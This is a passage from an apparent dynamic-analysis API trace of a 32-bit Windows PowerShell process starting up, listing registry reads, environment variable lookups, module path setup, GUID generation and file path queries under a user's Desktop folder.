Files (x86)", lpFilePart=0x0) returned 0x16 [0243.086] CoTaskMemAlloc (cb=0x20c) returned 0x86eb70 [0243.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x86eb70, nSize=0x104 | out: lpBuffer="ጀ\x80凐ۑrogram Files (x86)") returned 0x0 [0243.086] CoTaskMemFree (pv=0x86eb70) [0243.086] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e7a8 | out: phkResult=0x59e7a8*=0x674) returned 0x0 [0243.087] RegQueryValueExW (in: hKey=0x674, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e7c8, lpData=0x0, lpcbData=0x59e7c4*=0x0 | out: lpType=0x59e7c8*=0x1, lpData=0x0, lpcbData=0x59e7c4*=0x56) returned 0x0 [0243.087] RegQueryValueExW (in: hKey=0x674, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e7c8, lpData=0x4a21260, lpcbData=0x59e7c4*=0x56 | out: lpType=0x59e7c8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x59e7c4*=0x56) returned 0x0 [0243.087] RegCloseKey (hKey=0x674) returned 0x0 [0243.087] ExpandEnvironmentStringsW (in: lpSrc="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpDst=0x59e6f0, nSize=0x64 | out: lpDst="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules") returned 0x33 [0243.089] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0243.091] GetProcAddress (hModule=0x772d0000, lpProcName="IsWow64Process") returned 0x772e5a20 [0243.091] GetCurrentProcess () returned 0xffffffff [0243.092] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x59e844 | out: Wow64Process=0x59e844) returned 1 [0243.092] CoTaskMemAlloc (cb=0x20c) returned 0x86eb70 [0243.092] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x86eb70 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0243.095] CoTaskMemFree (pv=0x86eb70) [0243.095] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0243.095] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0243.096] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 1 [0243.117] CoTaskMemAlloc (cb=0x20c) returned 0x86eb70 [0243.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x86eb70, nSize=0x104 | out: lpBuffer="ጀ\x80凐ۑsers\\FD1HVy\\Documents") returned 0x0 [0243.118] CoTaskMemFree (pv=0x86eb70) [0243.266] EtwEventRegister (in: ProviderId=0x4a2a318, EnableCallback=0x4532d56, CallbackContext=0x0, RegHandle=0x4a2a2f4 | out: RegHandle=0x4a2a2f4) returned 0x0 [0243.267] EtwEventSetInformation (RegHandle=0x8f8158, InformationClass=0x54, EventInformation=0x2, InformationLength=0x4a2a2a8) returned 0x0 [0243.369] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e0d8 | out: phkResult=0x59e0d8*=0x680) returned 0x0 [0243.370] RegQueryValueExW (in: hKey=0x680, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e0f8, lpData=0x0, lpcbData=0x59e0f4*=0x0 | out: lpType=0x59e0f8*=0x1, lpData=0x0, lpcbData=0x59e0f4*=0x56) returned 0x0 [0243.370] RegQueryValueExW (in: hKey=0x680, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e0f8, lpData=0x4a3c674, lpcbData=0x59e0f4*=0x56 | out: lpType=0x59e0f8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x59e0f4*=0x56) returned 0x0 [0243.370] RegCloseKey (hKey=0x680) returned 0x0 [0243.393] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xe41a756a, Data2=0x300b, Data3=0x471a, Data4=([0]=0x8c, [1]=0x4a, [2]=0x65, [3]=0x2b, [4]=0x76, [5]=0x3e, [6]=0xeb, [7]=0x8f))) returned 0x0 [0243.393] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xae487e5c, Data2=0x8474, Data3=0x418d, Data4=([0]=0x96, [1]=0x7c, [2]=0xb4, [3]=0x1b, [4]=0x6, [5]=0x53, [6]=0xa6, [7]=0xe1))) returned 0x0 [0243.394] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x5309ab56, Data2=0x1c5, Data3=0x44e3, Data4=([0]=0xbe, [1]=0x5b, [2]=0x49, [3]=0x93, [4]=0x69, [5]=0xd9, [6]=0xe8, [7]=0x59))) returned 0x0 [0243.394] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xd280ce23, Data2=0x1507, Data3=0x43df, Data4=([0]=0xb5, [1]=0x75, [2]=0x75, [3]=0x79, [4]=0x2b, [5]=0x24, [6]=0x35, [7]=0xd1))) returned 0x0 [0243.394] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xd66135f6, Data2=0xf944, Data3=0x4b83, Data4=([0]=0xa4, [1]=0x24, [2]=0x17, [3]=0x1a, [4]=0x40, [5]=0xd5, [6]=0x94, [7]=0x38))) returned 0x0 [0243.394] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x33055016, Data2=0xe3c3, Data3=0x4487, Data4=([0]=0xbd, [1]=0xc9, [2]=0xee, [3]=0x11, [4]=0xbf, [5]=0xd7, [6]=0x7, [7]=0xf9))) returned 0x0 [0243.394] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xabd06258, Data2=0x190b, Data3=0x4c92, Data4=([0]=0xb6, [1]=0x8d, [2]=0x16, [3]=0x80, [4]=0x28, [5]=0xb, [6]=0x99, [7]=0x4d))) returned 0x0 [0243.394] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x363a40b2, Data2=0xbffb, Data3=0x42dc, Data4=([0]=0x9c, [1]=0x36, [2]=0xf0, [3]=0x69, [4]=0xc0, [5]=0x16, [6]=0x52, [7]=0xcb))) returned 0x0 [0243.406] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x7a43c638, Data2=0x990f, Data3=0x4c9e, Data4=([0]=0xb8, [1]=0x51, [2]=0x7c, [3]=0x9a, [4]=0x50, [5]=0x5e, [6]=0x18, [7]=0xaa))) returned 0x0 [0243.406] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x95a37407, Data2=0x490c, Data3=0x4a9a, Data4=([0]=0x8e, [1]=0x54, [2]=0x2c, [3]=0x6f, [4]=0x9a, [5]=0xfa, [6]=0x7d, [7]=0xa))) returned 0x0 [0243.406] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xcb0c988, Data2=0xfa9e, Data3=0x4ff1, Data4=([0]=0xb5, [1]=0x92, [2]=0x52, [3]=0xcb, [4]=0xa2, [5]=0xa3, [6]=0xcf, [7]=0x25))) returned 0x0 [0243.406] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xcc187a86, Data2=0xa09f, Data3=0x45f2, Data4=([0]=0x9c, [1]=0x6, [2]=0xf1, [3]=0xf0, [4]=0x73, [5]=0x53, [6]=0xd, [7]=0x99))) returned 0x0 [0243.406] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x3abf076, Data2=0x1569, Data3=0x4242, Data4=([0]=0xb4, [1]=0x93, [2]=0x8b, [3]=0xcc, [4]=0x3b, [5]=0x70, [6]=0x32, [7]=0x60))) returned 0x0 [0243.406] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xaa0ef28b, Data2=0xfd0a, Data3=0x4499, Data4=([0]=0xaa, [1]=0xf, [2]=0x40, [3]=0x59, [4]=0x39, [5]=0xd1, [6]=0x89, [7]=0x37))) returned 0x0 [0243.408] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x8064a572, Data2=0xca11, Data3=0x44ac, Data4=([0]=0xb3, [1]=0x4a, [2]=0x3a, [3]=0xd9, [4]=0xf4, [5]=0xd0, [6]=0xe2, [7]=0xa5))) returned 0x0 [0243.408] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xc609fd0c, Data2=0x87ee, Data3=0x41d2, Data4=([0]=0x84, [1]=0x42, [2]=0xa1, [3]=0x1e, [4]=0xb, [5]=0x22, [6]=0xf1, [7]=0x84))) returned 0x0 [0243.408] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x4232be4d, Data2=0x333b, Data3=0x4fee, Data4=([0]=0x9b, [1]=0xfb, [2]=0x66, [3]=0x60, [4]=0x55, [5]=0xd5, [6]=0xe8, [7]=0xf7))) returned 0x0 [0243.408] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x2a4d7aad, Data2=0x4959, Data3=0x4055, Data4=([0]=0xae, [1]=0x3e, [2]=0xf1, [3]=0x20, [4]=0x8, [5]=0x69, [6]=0xbc, [7]=0x43))) returned 0x0 [0243.506] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x4cdb61ee, Data2=0xd841, Data3=0x475d, Data4=([0]=0xa1, [1]=0x9c, [2]=0x95, [3]=0x5c, [4]=0xf7, [5]=0xa7, [6]=0x8e, [7]=0x8c))) returned 0x0 [0243.508] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x87fdff04, Data2=0xfdba, Data3=0x4bfa, Data4=([0]=0xa0, [1]=0xe, [2]=0x1, [3]=0xc7, [4]=0x7c, [5]=0x53, [6]=0xae, [7]=0x5f))) returned 0x0 [0243.508] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xf5cb7d8f, Data2=0x3858, Data3=0x4e39, Data4=([0]=0xb0, [1]=0x2e, [2]=0x1, [3]=0xd9, [4]=0x1b, [5]=0x30, [6]=0x80, [7]=0x5e))) returned 0x0 [0243.508] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xf6792e5b, Data2=0x343d, Data3=0x46c7, Data4=([0]=0x94, [1]=0x20, [2]=0xc9, [3]=0xae, [4]=0x3a, [5]=0x9c, [6]=0x38, [7]=0x79))) returned 0x0 [0243.508] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x23b494a4, Data2=0xe1af, Data3=0x4671, Data4=([0]=0xba, [1]=0xe7, [2]=0xf6, [3]=0xc6, [4]=0x2c, [5]=0x91, [6]=0xdc, [7]=0x78))) returned 0x0 [0243.508] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x3cbc457e, Data2=0xb1fd, Data3=0x4a43, Data4=([0]=0xb7, [1]=0xc6, [2]=0x4, [3]=0x3c, [4]=0x92, [5]=0x62, [6]=0x1b, [7]=0x57))) returned 0x0 [0243.508] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x110860e8, Data2=0xe1aa, Data3=0x4b89, Data4=([0]=0x8d, [1]=0x37, [2]=0xf2, [3]=0xe7, [4]=0x4c, [5]=0xde, [6]=0xa, [7]=0xcb))) returned 0x0 [0243.508] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x362ed17d, Data2=0xfc6a, Data3=0x4e81, Data4=([0]=0xa7, [1]=0xed, [2]=0x2b, [3]=0xb7, [4]=0xfa, [5]=0x10, [6]=0x10, [7]=0x4f))) returned 0x0 [0243.509] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xa01af455, Data2=0x1d72, Data3=0x46df, Data4=([0]=0x96, [1]=0xe7, [2]=0x9f, [3]=0x87, [4]=0xce, [5]=0x71, [6]=0xcc, [7]=0xba))) returned 0x0 [0243.509] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xb7058531, Data2=0x6c75, Data3=0x4bf4, Data4=([0]=0xad, [1]=0x54, [2]=0x9f, [3]=0x13, [4]=0x42, [5]=0xf1, [6]=0xe0, [7]=0xcb))) returned 0x0 [0243.509] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xa5e36879, Data2=0x2681, Data3=0x4242, Data4=([0]=0xa0, [1]=0x79, [2]=0x2a, [3]=0xc0, [4]=0xff, [5]=0xab, [6]=0x36, [7]=0xc0))) returned 0x0 [0243.509] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x203306d6, Data2=0xbbe2, Data3=0x48a7, Data4=([0]=0x87, [1]=0x6f, [2]=0xc7, [3]=0x71, [4]=0xc4, [5]=0xa8, [6]=0xbd, [7]=0x32))) returned 0x0 [0243.509] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xa88c20a, Data2=0xc0c5, Data3=0x4699, Data4=([0]=0x92, [1]=0x71, [2]=0x67, [3]=0xbf, [4]=0xc6, [5]=0x5e, [6]=0x9b, [7]=0x0))) returned 0x0 [0243.509] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xcfce9338, Data2=0x4aec, Data3=0x4780, Data4=([0]=0xab, [1]=0xfe, [2]=0x11, [3]=0xb1, [4]=0x8b, [5]=0x9b, [6]=0xf3, [7]=0x59))) returned 0x0 [0243.509] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xe938d1d9, Data2=0xc34c, Data3=0x4b89, Data4=([0]=0xa9, [1]=0x0, [2]=0x82, [3]=0x4f, [4]=0xc6, [5]=0xe6, [6]=0xb, [7]=0xbb))) returned 0x0 [0243.509] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x82619d2f, Data2=0xdf4f, Data3=0x4bf2, Data4=([0]=0xb6, [1]=0x31, [2]=0x24, [3]=0xa5, [4]=0xca, [5]=0x48, [6]=0x4a, [7]=0x4c))) returned 0x0 [0243.521] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xdd789982, Data2=0xf63f, Data3=0x44aa, Data4=([0]=0x88, [1]=0x50, [2]=0xb8, [3]=0x24, [4]=0x76, [5]=0x35, [6]=0xa8, [7]=0x6c))) returned 0x0 [0243.522] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xb7c74625, Data2=0x1d46, Data3=0x46db, Data4=([0]=0xa7, [1]=0xad, [2]=0x14, [3]=0x31, [4]=0xa0, [5]=0x58, [6]=0xb8, [7]=0x22))) returned 0x0 [0243.522] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x63e92b8e, Data2=0xe293, Data3=0x45e2, Data4=([0]=0x90, [1]=0x1d, [2]=0x87, [3]=0xa, [4]=0x42, [5]=0xdd, [6]=0xae, [7]=0x8b))) returned 0x0 [0243.733] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x68041c27, Data2=0x1f2d, Data3=0x4edc, Data4=([0]=0x88, [1]=0xd, [2]=0x1f, [3]=0x0, [4]=0xf5, [5]=0xdd, [6]=0x8c, [7]=0xea))) returned 0x0 [0243.733] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xbb812b0e, Data2=0x73db, Data3=0x4130, Data4=([0]=0x8a, [1]=0x7c, [2]=0x9c, [3]=0x74, [4]=0xef, [5]=0xc8, [6]=0x8d, [7]=0xfb))) returned 0x0 [0243.734] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x432f165, Data2=0x52fa, Data3=0x42bd, Data4=([0]=0xb8, [1]=0x32, [2]=0xb7, [3]=0x14, [4]=0x7b, [5]=0x7b, [6]=0x89, [7]=0x8d))) returned 0x0 [0243.734] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x75982114, Data2=0x1690, Data3=0x4bdb, Data4=([0]=0x80, [1]=0x21, [2]=0xbb, [3]=0x8, [4]=0x23, [5]=0xc9, [6]=0x5f, [7]=0x4e))) returned 0x0 [0243.734] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x62e91025, Data2=0x8a97, Data3=0x485e, Data4=([0]=0xb9, [1]=0xfa, [2]=0x1f, [3]=0xe0, [4]=0x17, [5]=0x8b, [6]=0xfc, [7]=0x66))) returned 0x0 [0243.734] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xa1769a92, Data2=0x2a46, Data3=0x4739, Data4=([0]=0xbf, [1]=0x45, [2]=0x14, [3]=0xe4, [4]=0xad, [5]=0x11, [6]=0x15, [7]=0x52))) returned 0x0 [0243.734] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xef582afb, Data2=0x6165, Data3=0x49fc, Data4=([0]=0x94, [1]=0x37, [2]=0x80, [3]=0x50, [4]=0xcc, [5]=0xb1, [6]=0xaf, [7]=0xf))) returned 0x0 [0243.734] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xfff2caa5, Data2=0xee3, Data3=0x4853, Data4=([0]=0xb6, [1]=0xad, [2]=0x42, [3]=0x65, [4]=0x33, [5]=0x6d, [6]=0xb2, [7]=0x77))) returned 0x0 [0243.734] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x35c4395c, Data2=0x291c, Data3=0x4cee, Data4=([0]=0xa3, [1]=0xb9, [2]=0x80, [3]=0x5f, [4]=0x26, [5]=0xa3, [6]=0x6f, [7]=0x28))) returned 0x0 [0244.246] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x7df49c, Data2=0x54ca, Data3=0x42aa, Data4=([0]=0xbd, [1]=0xe6, [2]=0xb, [3]=0x99, [4]=0x74, [5]=0x6e, [6]=0xda, [7]=0x4b))) returned 0x0 [0244.248] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x955ec83a, Data2=0x9ac9, Data3=0x4950, Data4=([0]=0x96, [1]=0x92, [2]=0x86, [3]=0x96, [4]=0xdd, [5]=0xc3, [6]=0x6e, [7]=0x3e))) returned 0x0 [0244.248] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x6b57ace2, Data2=0x3f64, Data3=0x4997, Data4=([0]=0xac, [1]=0x89, [2]=0x18, [3]=0xa2, [4]=0x1e, [5]=0x1, [6]=0xf, [7]=0x12))) returned 0x0 [0244.249] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xbf99a595, Data2=0xf65d, Data3=0x4254, Data4=([0]=0x90, [1]=0x89, [2]=0x8e, [3]=0x35, [4]=0xc1, [5]=0x80, [6]=0xce, [7]=0x33))) returned 0x0 [0244.249] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xe1730cee, Data2=0x9b61, Data3=0x47f9, Data4=([0]=0x96, [1]=0x6a, [2]=0x28, [3]=0x3, [4]=0x42, [5]=0x94, [6]=0xdb, [7]=0xf1))) returned 0x0 [0244.249] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x7576c8a, Data2=0x1a07, Data3=0x4dae, Data4=([0]=0x9b, [1]=0x1a, [2]=0xb9, [3]=0x11, [4]=0xfb, [5]=0x7e, [6]=0x82, [7]=0x2f))) returned 0x0 [0244.249] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xa774a1ec, Data2=0x49dd, Data3=0x4691, Data4=([0]=0x9d, [1]=0xe5, [2]=0xc7, [3]=0x7e, [4]=0x4c, [5]=0xf5, [6]=0x2d, [7]=0x83))) returned 0x0 [0244.249] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0xe62db049, Data2=0x8726, Data3=0x4832, Data4=([0]=0x82, [1]=0xca, [2]=0x59, [3]=0xb5, [4]=0xb, [5]=0xd8, [6]=0x10, [7]=0x46))) returned 0x0 [0244.249] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x1c7eb613, Data2=0x6fcd, Data3=0x4551, Data4=([0]=0xa7, [1]=0xca, [2]=0xa4, [3]=0xc2, [4]=0xaa, [5]=0xb5, [6]=0x4c, [7]=0x2b))) returned 0x0 [0244.249] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x8a82907c, Data2=0xebe2, Data3=0x4a68, Data4=([0]=0x9a, [1]=0x2c, [2]=0xa4, [3]=0x56, [4]=0xe3, [5]=0x12, [6]=0x44, [7]=0xd8))) returned 0x0 [0244.249] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x50c1a841, Data2=0xcaee, Data3=0x41ca, Data4=([0]=0x8e, [1]=0xc3, [2]=0x6a, [3]=0x4, [4]=0xa5, [5]=0x2b, [6]=0xa7, [7]=0x49))) returned 0x0 [0244.261] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x1b06101f, Data2=0xda1e, Data3=0x4554, Data4=([0]=0x91, [1]=0x14, [2]=0xf0, [3]=0xfc, [4]=0x1e, [5]=0x8f, [6]=0xc8, [7]=0x14))) returned 0x0 [0244.262] CoCreateGuid (in: pguid=0x59bf84 | out: pguid=0x59bf84*(Data1=0x48b92059, Data2=0x3f28, Data3=0x4acd, Data4=([0]=0x90, [1]=0xe7, [2]=0xa9, [3]=0x9a, [4]=0x38, [5]=0xf8, [6]=0xf7, [7]=0xeb))) returned 0x0 [0244.263] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e0d8 | out: phkResult=0x59e0d8*=0x674) returned 0x0 [0244.263] RegQueryValueExW (in: hKey=0x674, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e0f8, lpData=0x0, lpcbData=0x59e0f4*=0x0 | out: lpType=0x59e0f8*=0x1, lpData=0x0, lpcbData=0x59e0f4*=0x56) returned 0x0 [0244.263] RegQueryValueExW (in: hKey=0x674, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e0f8, lpData=0x4b0488c, lpcbData=0x59e0f4*=0x56 | out: lpType=0x59e0f8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x59e0f4*=0x56) returned 0x0 [0244.263] RegCloseKey (hKey=0x674) returned 0x0 [0244.269] CoCreateGuid (in: pguid=0x59e080 | out: pguid=0x59e080*(Data1=0xc095c41c, Data2=0xccf2, Data3=0x4288, Data4=([0]=0x92, [1]=0x36, [2]=0x27, [3]=0xb3, [4]=0xbe, [5]=0x76, [6]=0xc1, [7]=0xd))) returned 0x0 [0244.269] CoCreateGuid (in: pguid=0x59e080 | out: pguid=0x59e080*(Data1=0xd67b0725, Data2=0x2374, Data3=0x47d0, Data4=([0]=0xa1, [1]=0x1d, [2]=0xf6, [3]=0xba, [4]=0x7c, [5]=0xb5, [6]=0x31, [7]=0x3d))) returned 0x0 [0244.269] CoCreateGuid (in: pguid=0x59e080 | out: pguid=0x59e080*(Data1=0x76ed8924, Data2=0x8581, Data3=0x441b, Data4=([0]=0xac, [1]=0x2b, [2]=0x53, [3]=0x15, [4]=0x99, [5]=0x92, [6]=0xe2, [7]=0xb5))) returned 0x0 [0244.269] CoCreateGuid (in: pguid=0x59e080 | out: pguid=0x59e080*(Data1=0x80fde122, Data2=0xa5a3, Data3=0x465e, Data4=([0]=0xa1, [1]=0x5, [2]=0xf0, [3]=0x72, [4]=0x83, [5]=0xf5, [6]=0x3c, [7]=0x94))) returned 0x0 [0244.270] CoCreateGuid (in: pguid=0x59e080 | out: pguid=0x59e080*(Data1=0x172b20c9, Data2=0xfa8e, Data3=0x436f, Data4=([0]=0xbf, [1]=0x45, [2]=0x57, [3]=0x3b, [4]=0x82, [5]=0x78, [6]=0x3d, [7]=0x8c))) returned 0x0 [0244.270] CoCreateGuid (in: pguid=0x59e080 | out: pguid=0x59e080*(Data1=0x6bff6503, Data2=0x23ac, Data3=0x41a3, Data4=([0]=0xa6, [1]=0xf3, [2]=0x5f, [3]=0x13, [4]=0x7a, [5]=0xa4, [6]=0xee, [7]=0xb5))) returned 0x0 [0244.763] GetLogicalDrives () returned 0x4 [0244.763] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0244.763] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0244.764] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0244.764] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0244.764] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.764] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0244.767] CoTaskMemAlloc (cb=0x20c) returned 0x8245b8 [0244.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x8245b8, nSize=0x104 | out: lpBuffer="隰۝加ۜ㊴畮㊤畮\x0e") returned 0x0 [0244.767] CoTaskMemFree (pv=0x8245b8) [0244.768] CoTaskMemAlloc (cb=0x20c) returned 0x8245b8 [0244.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x8245b8, nSize=0x104 | out: lpBuffer="隰۝加ۜ㊴畮㊤畮\x0e") returned 0x0 [0244.768] CoTaskMemFree (pv=0x8245b8) [0244.768] CoTaskMemAlloc (cb=0x20c) returned 0x8245b8 [0244.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x8245b8, nSize=0x104 | out: lpBuffer="隰۝加ۜ㊴畮㊤畮\x0e") returned 0x0 [0244.768] CoTaskMemFree (pv=0x8245b8) [0244.772] CoTaskMemAlloc (cb=0x20c) returned 0x8245b8 [0244.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x8245b8, nSize=0x104 | out: lpBuffer="隰۝加ۜ㊴畮㊤畮\x0e") returned 0x0 [0244.772] CoTaskMemFree (pv=0x8245b8) [0244.779] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0244.781] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0244.781] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0244.783] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0244.783] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0244.783] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9 [0244.783] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x9, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0244.783] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0244.783] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0244.783] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0244.783] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0244.783] 